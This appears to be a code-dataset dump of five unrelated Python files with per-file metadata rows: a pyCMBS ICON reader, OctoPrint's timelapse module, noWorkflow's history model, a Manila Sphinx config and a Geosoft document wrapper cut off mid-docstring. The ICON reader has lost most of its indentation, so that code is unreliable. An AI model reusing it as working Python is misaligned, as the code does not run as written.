For COPYING and LICENSE details, please refer to the LICENSE file
"""
from pycmbs.data import Data
import os
from pycmbs.netcdf import *
import numpy as np
class Icon(Data):
"""
Main class for ICON data handling
"""
def __init__(self, filename, gridfile, varname, read=False, **kwargs):
"""
Parameters
----------
filename : str
filename of data file
gridfile : str
filename of grid definition file
varname : str
name of variable to handle
read : bool
specify if data should be read immediately
"""
Data.__init__(self, filename, varname, **kwargs)
self.gridfile = gridfile
self.gridtype = 'unstructured'
#---
def read(self, time_var='time'):
"""
        This is a special routine for reading data stored in the ICON structure;
        it is a bit redundant to Data.read()
Parameters
----------
time_var : str
name of time variable (default='time')
"""
print('Reading ICON data ...')
if not os.path.exists(self.filename):
raise ValueError('File not existing: %s' % self.filename)
if not os.path.exists(self.gridfile):
raise ValueError('File not existing: %s' % self.gridfile)
#--- time variable
self.time_var = time_var
#--- data field
# [time,ncell]
self.data = self.read_netcdf(self.varname)
nt, ncell = self.data.shape
# reshape so we have a common 3D structure like always in pyCMBS
self.data = self.data.reshape((nt, 1, ncell))
if self.data is None:
            raise ValueError('The data in the file %s does not exist. '
                             'This must not happen!' % self.filename)
        if self.scale_factor is None:
            raise ValueError('The scale_factor for file %s is None; '
                             'this must not happen!' % self.filename)
self.data *= self.scale_factor
#--- read lat/lon
File = NetCDFHandler()
File.open_file(self.gridfile, 'r')
# grid cell center coordinates
self.lon = File.get_variable('clon') * 180. / np.pi
self.lat = File.get_variable('clat') * 180. / np.pi
self.ncell = len(self.lon)
self.vlon = File.get_variable('clon_vertices') * 180. / np.pi
self.vlat = File.get_variable('clat_vertices') * 180. / np.pi
File.close()
#--- read time variable
if self.time_var is not None:
# returns either None or a masked array
self.time = self.read_netcdf(self.time_var)
if hasattr(self.time, 'mask'):
self.time = self.time.data
else:
                pass  # value is either None or a plain array; nothing to unwrap
if self.time is not None:
if self.time.ndim != 1:
# remove singletone dimensions
self.time = self.time.flatten()
else:
self.time = None
#--- determine time --> convert to python timestep
if self.time is not None:
self.set_time()
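# Usage sketch (illustrative only, not part of the original module; file and
# variable names are placeholders): read a variable from an ICON output file
# together with its grid description file.
#
#   icon = Icon('icon_output.nc', 'icon_grid.nc', 'tas')
#   icon.read()                  # fills icon.data, icon.lon/lat, icon.vlon/vlat and icon.time
#   print(icon.data.shape)       # (ntime, 1, ncell)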
| mit | 4,772,429,266,076,823,000 | 28.752294 | 74 | 0.547641 | false |
fastbot3d/Octoprint | src/octoprint/timelapse.py | 1 | 12781 | # coding=utf-8
__author__ = "Gina Häußge <[email protected]>"
__license__ = 'GNU Affero General Public License http://www.gnu.org/licenses/agpl.html'
import logging
import os
import threading
import urllib
import time
import subprocess
import fnmatch
import datetime
import sys
import shutil
import octoprint.util as util
from octoprint.settings import settings
from octoprint.events import eventManager, Events
import sarge
# currently configured timelapse
current = None
def getFinishedTimelapses():
files = []
basedir = settings().getBaseFolder("timelapse")
for osFile in os.listdir(basedir):
if not fnmatch.fnmatch(osFile, "*.mpg"):
continue
statResult = os.stat(os.path.join(basedir, osFile))
files.append({
"name": osFile,
"size": util.getFormattedSize(statResult.st_size),
"bytes": statResult.st_size,
"date": util.getFormattedDateTime(datetime.datetime.fromtimestamp(statResult.st_ctime))
})
return files
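# Each entry in the returned list has this shape (values invented for illustration;
# the exact strings come from util.getFormattedSize/util.getFormattedDateTime):
#
#   {"name": "job_20150101.mpg", "size": "12.3MB", "bytes": 12895432, "date": "2015-01-01 12:00"}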
validTimelapseTypes = ["off", "timed", "zchange"]
updateCallbacks = []
def registerCallback(callback):
if not callback in updateCallbacks:
updateCallbacks.append(callback)
def unregisterCallback(callback):
if callback in updateCallbacks:
updateCallbacks.remove(callback)
def notifyCallbacks(timelapse):
if timelapse is None:
config = None
else:
config = timelapse.configData()
for callback in updateCallbacks:
try: callback.sendTimelapseConfig(config)
except: logging.getLogger(__name__).exception("Exception while pushing timelapse configuration")
def configureTimelapse(config=None, persist=False):
global current
if config is None:
config = settings().get(["webcam", "timelapse"])
if current is not None:
current.unload()
type = config["type"]
postRoll = 0
if "postRoll" in config:
postRoll = config["postRoll"]
if type is None or "off" == type:
current = None
elif "zchange" == type:
current = ZTimelapse(postRoll=postRoll)
elif "timed" == type:
interval = 10
if "options" in config and "interval" in config["options"]:
interval = config["options"]["interval"]
current = TimedTimelapse(postRoll=postRoll, interval=interval)
notifyCallbacks(current)
if persist:
settings().set(["webcam", "timelapse"], config)
settings().save()
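# Example (sketch, not taken from the original source): a configuration dict as
# consumed by configureTimelapse(); the keys mirror the checks above, the values
# are invented.
#
#   configureTimelapse({
#       "type": "timed",               # one of validTimelapseTypes
#       "postRoll": 5,                 # extra footage appended after the print
#       "options": {"interval": 10},   # only used by the "timed" type
#   }, persist=False)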
class Timelapse(object):
def __init__(self, postRoll=0):
self._logger = logging.getLogger(__name__)
self._imageNumber = None
self._inTimelapse = False
self._gcodeFile = None
self._postRoll = postRoll
self._postRollStart = None
self._onPostRollDone = None
self._captureDir = settings().getBaseFolder("timelapse_tmp")
self._movieDir = settings().getBaseFolder("timelapse")
self._snapshotUrl = settings().get(["webcam", "snapshot"])
self._fps = 25
self._renderThread = None
self._captureMutex = threading.Lock()
# subscribe events
eventManager().subscribe(Events.PRINT_STARTED, self.onPrintStarted)
eventManager().subscribe(Events.PRINT_FAILED, self.onPrintDone)
eventManager().subscribe(Events.PRINT_DONE, self.onPrintDone)
eventManager().subscribe(Events.PRINT_RESUMED, self.onPrintResumed)
for (event, callback) in self.eventSubscriptions():
eventManager().subscribe(event, callback)
def postRoll(self):
return self._postRoll
def unload(self):
if self._inTimelapse:
self.stopTimelapse(doCreateMovie=False)
# unsubscribe events
eventManager().unsubscribe(Events.PRINT_STARTED, self.onPrintStarted)
eventManager().unsubscribe(Events.PRINT_FAILED, self.onPrintDone)
eventManager().unsubscribe(Events.PRINT_DONE, self.onPrintDone)
eventManager().unsubscribe(Events.PRINT_RESUMED, self.onPrintResumed)
for (event, callback) in self.eventSubscriptions():
eventManager().unsubscribe(event, callback)
def onPrintStarted(self, event, payload):
"""
Override this to perform additional actions upon start of a print job.
"""
self.startTimelapse(payload["file"])
def onPrintDone(self, event, payload):
"""
Override this to perform additional actions upon the stop of a print job.
"""
self.stopTimelapse(success=(event==Events.PRINT_DONE))
def onPrintResumed(self, event, payload):
"""
		Override this to perform additional actions upon the resuming of a print job.
"""
if not self._inTimelapse:
self.startTimelapse(payload["file"])
def eventSubscriptions(self):
"""
Override this method to subscribe to additional events by returning an array of (event, callback) tuples.
Events that are already subscribed:
* PrintStarted - self.onPrintStarted
* PrintResumed - self.onPrintResumed
* PrintFailed - self.onPrintDone
* PrintDone - self.onPrintDone
"""
return []
def configData(self):
"""
Override this method to return the current timelapse configuration data. The data should have the following
form:
type: "<type of timelapse>",
options: { <additional options> }
"""
return None
def startTimelapse(self, gcodeFile):
self._logger.debug("Starting timelapse for %s" % gcodeFile)
self.cleanCaptureDir()
self._imageNumber = 0
self._inTimelapse = True
self._gcodeFile = os.path.basename(gcodeFile)
def stopTimelapse(self, doCreateMovie=True, success=True):
self._logger.debug("Stopping timelapse")
self._inTimelapse = False
def resetImageNumber():
self._imageNumber = None
def createMovie():
self._renderThread = threading.Thread(target=self._createMovie, kwargs={"success": success})
self._renderThread.daemon = True
self._renderThread.start()
def resetAndCreate():
resetImageNumber()
createMovie()
if self._postRoll > 0:
self._postRollStart = time.time()
if doCreateMovie:
self._onPostRollDone = resetAndCreate
else:
self._onPostRollDone = resetImageNumber
self.processPostRoll()
else:
self._postRollStart = None
if doCreateMovie:
resetAndCreate()
else:
resetImageNumber()
def processPostRoll(self):
pass
def captureImage(self):
if self._captureDir is None:
self._logger.warn("Cannot capture image, capture directory is unset")
return
if self._imageNumber is None:
self._logger.warn("Cannot capture image, image number is unset")
return
with self._captureMutex:
filename = os.path.join(self._captureDir, "tmp_%05d.jpg" % self._imageNumber)
self._imageNumber += 1
self._logger.debug("Capturing image to %s" % filename)
captureThread = threading.Thread(target=self._captureWorker, kwargs={"filename": filename})
captureThread.daemon = True
captureThread.start()
return filename
def _captureWorker(self, filename):
eventManager().fire(Events.CAPTURE_START, {"file": filename})
try:
urllib.urlretrieve(self._snapshotUrl, filename)
self._logger.debug("Image %s captured from %s" % (filename, self._snapshotUrl))
except:
self._logger.exception("Could not capture image %s from %s, decreasing image counter again" % (filename, self._snapshotUrl))
with self._captureMutex:
if self._imageNumber is not None and self._imageNumber > 0:
self._imageNumber -= 1
eventManager().fire(Events.CAPTURE_DONE, {"file": filename})
def _createMovie(self, success=True):
ffmpeg = settings().get(["webcam", "ffmpeg"])
bitrate = settings().get(["webcam", "bitrate"])
if ffmpeg is None or bitrate is None:
self._logger.warn("Cannot create movie, path to ffmpeg or desired bitrate is unset")
return
input = os.path.join(self._captureDir, "tmp_%05d.jpg")
if success:
output = os.path.join(self._movieDir, "%s_%s.mpg" % (os.path.splitext(self._gcodeFile)[0], time.strftime("%Y%m%d%H%M%S")))
else:
output = os.path.join(self._movieDir, "%s_%s-failed.mpg" % (os.path.splitext(self._gcodeFile)[0], time.strftime("%Y%m%d%H%M%S")))
# prepare ffmpeg command
command = [
ffmpeg, '-loglevel', 'error', '-i', input, '-vcodec', 'mpeg2video', '-pix_fmt', 'yuv420p', '-r', str(self._fps), '-y', '-b:v', bitrate,
'-f', 'vob']
filters = []
# flip video if configured
if settings().getBoolean(["webcam", "flipH"]):
filters.append('hflip')
if settings().getBoolean(["webcam", "flipV"]):
filters.append('vflip')
# add watermark if configured
watermarkFilter = None
if settings().getBoolean(["webcam", "watermark"]):
watermark = os.path.join(os.path.dirname(__file__), "static", "img", "watermark.png")
if sys.platform == "win32":
# Because ffmpeg hiccups on windows' drive letters and backslashes we have to give the watermark
# path a special treatment. Yeah, I couldn't believe it either...
watermark = watermark.replace("\\", "/").replace(":", "\\\\:")
watermarkFilter = "movie=%s [wm]; [%%(inputName)s][wm] overlay=10:main_h-overlay_h-10" % watermark
filterstring = None
if len(filters) > 0:
if watermarkFilter is not None:
filterstring = "[in] %s [postprocessed]; %s [out]" % (",".join(filters), watermarkFilter % {"inputName": "postprocessed"})
else:
filterstring = "[in] %s [out]" % ",".join(filters)
elif watermarkFilter is not None:
filterstring = watermarkFilter % {"inputName": "in"} + " [out]"
if filterstring is not None:
self._logger.debug("Applying videofilter chain: %s" % filterstring)
command.extend(["-vf", sarge.shell_quote(filterstring)])
# finalize command with output file
self._logger.debug("Rendering movie to %s" % output)
command.append("\"" + output + "\"")
eventManager().fire(Events.MOVIE_RENDERING, {"gcode": self._gcodeFile, "movie": output, "movie_basename": os.path.basename(output)})
command_str = " ".join(command)
self._logger.debug("Executing command: %s" % command_str)
try:
p = sarge.run(command_str, stderr=sarge.Capture())
if p.returncode == 0:
eventManager().fire(Events.MOVIE_DONE, {"gcode": self._gcodeFile, "movie": output, "movie_basename": os.path.basename(output)})
else:
returncode = p.returncode
stderr_text = p.stderr.text
self._logger.warn("Could not render movie, got return code %r: %s" % (returncode, stderr_text))
eventManager().fire(Events.MOVIE_FAILED, {"gcode": self._gcodeFile, "movie": output, "movie_basename": os.path.basename(output), "returncode": returncode, "error": stderr_text})
except:
self._logger.exception("Could not render movie due to unknown error")
eventManager().fire(Events.MOVIE_FAILED, {"gcode": self._gcodeFile, "movie": output, "movie_basename": os.path.basename(output), "returncode": 255, "error": "Unknown error"})
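	# For reference, the command assembled above typically looks roughly like the
	# following (paths, frame rate and bitrate are invented for illustration, not
	# taken from a real run):
	#
	#   ffmpeg -loglevel error -i /tmp/timelapse/tmp_%05d.jpg -vcodec mpeg2video \
	#          -pix_fmt yuv420p -r 25 -y -b:v 10000k -f vob "/timelapse/job_20150101120000.mpg"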
def cleanCaptureDir(self):
if not os.path.isdir(self._captureDir):
self._logger.warn("Cannot clean capture directory, it is unset")
return
for filename in os.listdir(self._captureDir):
if not fnmatch.fnmatch(filename, "*.jpg"):
continue
os.remove(os.path.join(self._captureDir, filename))
class ZTimelapse(Timelapse):
def __init__(self, postRoll=0):
Timelapse.__init__(self, postRoll=postRoll)
self._logger.debug("ZTimelapse initialized")
def eventSubscriptions(self):
return [
("ZChange", self._onZChange)
]
def configData(self):
return {
"type": "zchange"
}
def processPostRoll(self):
Timelapse.processPostRoll(self)
filename = os.path.join(self._captureDir, "tmp_%05d.jpg" % self._imageNumber)
self._imageNumber += 1
with self._captureMutex:
self._captureWorker(filename)
for i in range(self._postRoll * self._fps):
newFile = os.path.join(self._captureDir, "tmp_%05d.jpg" % (self._imageNumber))
self._imageNumber += 1
shutil.copyfile(filename, newFile)
if self._onPostRollDone is not None:
self._onPostRollDone()
def _onZChange(self, event, payload):
self.captureImage()
class TimedTimelapse(Timelapse):
def __init__(self, postRoll=0, interval=1):
Timelapse.__init__(self, postRoll=postRoll)
self._interval = interval
if self._interval < 1:
self._interval = 1 # force minimum interval of 1s
self._timerThread = None
self._logger.debug("TimedTimelapse initialized")
def interval(self):
return self._interval
def configData(self):
return {
"type": "timed",
"options": {
"interval": self._interval
}
}
def onPrintStarted(self, event, payload):
Timelapse.onPrintStarted(self, event, payload)
if self._timerThread is not None:
return
self._timerThread = threading.Thread(target=self._timerWorker)
self._timerThread.daemon = True
self._timerThread.start()
def onPrintDone(self, event, payload):
Timelapse.onPrintDone(self, event, payload)
self._timerThread = None
def _timerWorker(self):
self._logger.debug("Starting timer for interval based timelapse")
while self._inTimelapse or (self._postRollStart and time.time() - self._postRollStart <= self._postRoll * self._fps):
self.captureImage()
time.sleep(self._interval)
if self._postRollStart is not None and self._onPostRollDone is not None:
self._onPostRollDone()
self._postRollStart = None
| agpl-3.0 | 1,734,288,371,365,720,600 | 29.941889 | 181 | 0.707098 | false |
paopao74cn/noworkflow | capture/noworkflow/now/models/history.py | 1 | 5563 | # Copyright (c) 2015 Universidade Federal Fluminense (UFF)
# Copyright (c) 2015 Polytechnic Institute of New York University.
# This file is part of noWorkflow.
# Please, consult the license terms in the LICENSE file.
from __future__ import (absolute_import, print_function,
division, unicode_literals)
from collections import defaultdict, OrderedDict
from .model import Model
from ..graphs.history_graph import HistoryGraph
from ..utils import calculate_duration, FORMAT
from ..persistence import row_to_dict
from ..persistence import persistence as pers
class History(Model):
""" This model represents the workflow evolution history
It is possible to filter the evolution history by selecting the script:
history.script = "script1.py"
The list of scripts can be accessed by:
history.scripts()
It is also possible to filter the evolution history by selecting the
trial status:
history.execution = "finished"
The list of status are:
finished: show only finished trials
unfinished: show only unfinished trials
backup: show only backup trials
The default option for both filters is "*", which means that all trials
appear in the history
history.script = "*"
history.execution = "*"
You can change the graph width and height by the variables:
history.graph.width = 600
history.graph.height = 200
"""
DEFAULT = {
'graph.width': 700,
'graph.height': 300,
'script': '*',
'execution': '*',
'data': {},
}
REPLACE = {
'graph_width': 'graph.width',
'graph_height': 'graph.height',
}
def __init__(self, **kwargs):
super(History, self).__init__(**kwargs)
self.graph = HistoryGraph()
self.initialize_default(kwargs)
self.execution_options = ["*", "finished", "unfinished", "backup"]
def scripts(self):
""" Returns the list of scripts used for trials """
return {s[0].rsplit('/', 1)[-1] for s in pers.distinct_scripts()}
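    # Usage sketch (illustrative only, not part of the original module): filtering
    # the evolution history as described in the class docstring.
    #
    #   history = History()
    #   history.script = "script1.py"      # restrict to a single script
    #   history.execution = "finished"     # restrict to finished trials
    #   graph = history.graph_data()       # {'nodes': [...], 'edges': [...]}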
def graph_data(self, script="*", execution="*"):
""" Prepares evolution history as a dict """
if self.script != "*" and script == "*":
script = self.script
if self.execution != "*" and execution == "*":
execution = self.execution
key = (script, execution)
if key in self.data:
return self.data[key]
nodes, edges = [], []
result = {'nodes': nodes, 'edges': edges}
id_map, children = {}, defaultdict(list)
scripts, order = defaultdict(list), OrderedDict()
# Filter nodes and adds to dicts
tid = 0
for trial in map(row_to_dict, pers.load('trial', order="start")):
different_script = (trial['script'] != script)
finished = trial['finish']
unfinished = not finished and trial['run']
backup = not finished and not trial['run']
if script != '*' and different_script:
continue
if execution == 'finished' and not finished:
continue
if execution == 'unfinished' and not unfinished:
continue
if execution == 'backup' and not backup:
continue
trial_id = trial["id"]
trial["level"] = 0
trial["status"] = "Finished" if trial["finish"] else "Unfinished"
if not trial['run']:
trial["status"] = "Backup"
trial["tooltip"] = """
<b>{script}</b><br>
{status}<br>
Start: {start}<br>
Finish: {finish}
""".format(**trial)
if trial['finish']:
duration = calculate_duration(trial)
trial["tooltip"] += """
<br>
Duration: {duration}ns
""".format(duration=duration)
trial['duration'] = duration
id_map[trial_id] = tid
scripts[trial['script']].append(trial)
nodes.append(trial)
tid += 1
# Create edges
for trial in reversed(nodes):
trial_id, parent_id = trial["id"], trial["parent_id"]
if parent_id and parent_id in id_map:
edges.append({
'source': id_map[trial_id],
'target': id_map[parent_id],
'right': 1,
'level': 0
})
children[parent_id].append(trial_id)
order[trial['script']] = 1
# Set position
level = 0
for script in order:
last = level
for trial in scripts[script]:
trial_id, parent_id = trial["id"], trial["parent_id"]
if parent_id and parent_id in id_map:
parent = nodes[id_map[parent_id]]
if children[parent_id].index(trial_id) > 0:
trial["level"] = last
last += 1
else:
trial["level"] = parent["level"]
level = max(level, trial["level"] + 1)
else:
trial["level"] = level
level += 1
last += 1
self.data[key] = result
return result
def _repr_html_(self):
""" Display d3 graph on ipython notebook """
return self.graph._repr_html_(history=self) | mit | -6,656,497,510,584,656,000 | 32.926829 | 77 | 0.528132 | false |
openstack/manila | releasenotes/source/conf.py | 1 | 8885 | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Manila Release Notes documentation build configuration file, created by
# sphinx-quickstart on Tue Nov 3 17:40:50 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
# sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'reno.sphinxext',
'openstackdocstheme',
]
# openstackdocstheme options
openstackdocs_repo_name = 'openstack/manila'
openstackdocs_bug_project = 'manila'
openstackdocs_bug_tag = 'release notes'
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
# source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
copyright = u'2015, Manila Developers'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
# language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all
# documents.
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'native'
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
# keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'openstackdocs'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
# html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = [openstackdocstheme.get_html_theme_path()]
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
# html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
# html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
# html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
# html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
# html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
# html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
# html_additional_pages = {}
# If false, no module index is generated.
# html_domain_indices = True
# If false, no index is generated.
# html_use_index = True
# If true, the index is split into individual pages for each letter.
# html_split_index = False
# If true, links to the reST sources are added to the pages.
# html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
# html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
# html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
# html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'ManilaReleaseNotesdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
# 'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
('index', 'ManilaReleaseNotes.tex', u'Manila Release Notes Documentation',
u'Manila Developers', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
# latex_use_parts = False
# If true, show page references after internal links.
# latex_show_pagerefs = False
# If true, show URL addresses after external links.
# latex_show_urls = False
# Documents to append as an appendix to all manuals.
# latex_appendices = []
# If false, no module index is generated.
# latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'manilareleasenotes', u'Manila Release Notes Documentation',
[u'Manila Developers'], 1)
]
# If true, show URL addresses after external links.
# man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'ManilaReleaseNotes', u'Manila Release Notes Documentation',
u'Manila Developers', 'ManilaReleaseNotes',
'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
# texinfo_appendices = []
# If false, no module index is generated.
# texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
# texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
# texinfo_no_detailmenu = False
# -- Options for Internationalization output ------------------------------
locale_dirs = ['locale/']
| apache-2.0 | 3,138,875,757,549,318,700 | 32.152985 | 79 | 0.706697 | false |
GeosoftInc/gxpy | geosoft/gxapi/GXDOCU.py | 1 | 10991 | ### extends 'class_empty.py'
### block ClassImports
# NOTICE: Do not edit anything here, it is generated code
from . import gxapi_cy
from geosoft.gxapi import GXContext, float_ref, int_ref, str_ref
### endblock ClassImports
### block Header
# NOTICE: The code generator will not replace the code in this block
### endblock Header
### block ClassImplementation
# NOTICE: Do not edit anything here, it is generated code
class GXDOCU(gxapi_cy.WrapDOCU):
"""
GXDOCU class.
Class to work with documents
"""
def __init__(self, handle=0):
super(GXDOCU, self).__init__(GXContext._get_tls_geo(), handle)
@classmethod
def null(cls):
"""
A null (undefined) instance of `GXDOCU <geosoft.gxapi.GXDOCU>`
:returns: A null `GXDOCU <geosoft.gxapi.GXDOCU>`
:rtype: GXDOCU
"""
return GXDOCU()
def is_null(self):
"""
Check if this is a null (undefined) instance
:returns: True if this is a null (undefined) instance, False otherwise.
:rtype: bool
"""
return self._internal_handle() == 0
# Miscellaneous
def copy(self, doc_us):
"""
Copy `GXDOCU <geosoft.gxapi.GXDOCU>`
:param doc_us: Source `GXDOCU <geosoft.gxapi.GXDOCU>`
:type doc_us: GXDOCU
.. versionadded:: 5.1.1
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
self._copy(doc_us)
@classmethod
def create(cls):
"""
        Create a document object
:returns: `GXDOCU <geosoft.gxapi.GXDOCU>` Object
:rtype: GXDOCU
.. versionadded:: 5.1.1
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
ret_val = gxapi_cy.WrapDOCU._create(GXContext._get_tls_geo())
return GXDOCU(ret_val)
@classmethod
def create_s(cls, bf):
"""
Create from a serialized source
:param bf: `GXBF <geosoft.gxapi.GXBF>` from which to read `GXDOCU <geosoft.gxapi.GXDOCU>`
:type bf: GXBF
:returns: `GXDOCU <geosoft.gxapi.GXDOCU>` Object
:rtype: GXDOCU
.. versionadded:: 5.1.1
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
ret_val = gxapi_cy.WrapDOCU._create_s(GXContext._get_tls_geo(), bf)
return GXDOCU(ret_val)
def get_file(self, file):
"""
Get the document and place in a file.
:param file: File to which to write document
:type file: str
.. versionadded:: 5.1.1
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
self._get_file(file.encode())
def get_file_meta(self, file):
"""
Get the document and place in a file with metadata.
:param file: File to which to write document
:type file: str
.. versionadded:: 5.1.8
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
**Note:** If this document is only a URL link, the URL link will
be resolved and the document downloaded from the appropriate
server using the protocol specified.
        If the document has metadata and the native document format does not
        support metadata, the metadata will be placed in an associated
        file "filename.extension.GeosoftMeta"
"""
self._get_file_meta(file.encode())
def get_meta(self, meta):
"""
Get the document's meta
:param meta: `GXMETA <geosoft.gxapi.GXMETA>` object to fill in with the document's meta
:type meta: GXMETA
.. versionadded:: 5.1.1
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
self._get_meta(meta)
def doc_name(self, name):
"""
The document name.
:param name: Buffer to fill with document name
:type name: str_ref
.. versionadded:: 5.1.1
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
name.value = self._doc_name(name.value.encode())
def file_name(self, name):
"""
The original document file name.
:param name: Buffer to fill with document file name
:type name: str_ref
.. versionadded:: 5.1.1
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
name.value = self._file_name(name.value.encode())
def have_meta(self):
"""
Checks if a document has metadata.
:rtype: bool
.. versionadded:: 5.1.1
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
ret_val = self._have_meta()
return ret_val
def is_reference(self):
"""
Is the document only a reference (a URL) ?
:returns: 1 - Yes, 0 - No
:rtype: int
.. versionadded:: 5.1.6
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
ret_val = self._is_reference()
return ret_val
def open(self, mode):
"""
Open a document in the document viewer
:param mode: :ref:`DOCU_OPEN`
:type mode: int
.. versionadded:: 5.1.1
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
**Note:** On Windows, the default application for the file extension is
used to open the file.
"""
self._open(mode)
def serial(self, bf):
"""
Serialize `GXDOCU <geosoft.gxapi.GXDOCU>`
:param bf: `GXBF <geosoft.gxapi.GXBF>` in which to write object
:type bf: GXBF
.. versionadded:: 5.1.1
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
self._serial(bf)
def set_file(self, type, name, file):
"""
Set the document from a file source.
:param type: Document type
:param name: Document name, if "" file name will be used
:param file: Document file, must exist
:type type: str
:type name: str
:type file: str
.. versionadded:: 5.1.1
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
**Note:** Document types are normally identified by their extension. If you
leave the document type blank, the extension of the document file
will be used as the document type.
To resolve conflicting types, you can define your own unique type
by entering your own type "extension" string.
The following types are pre-defined (as are any normal Geosoft
file types):
"htm" HTML
"html" HTML
"txt" ASCII text file
"doc" Word for Windows document
"pdf" Adobe PDF
"map" Geosoft map file
"mmap" Mapinfo map file (real extension "map")
"grd" Geosoft grid file
"gdb" Geosoft database
URL Document Links
The document name can be a URL link to the document using one of
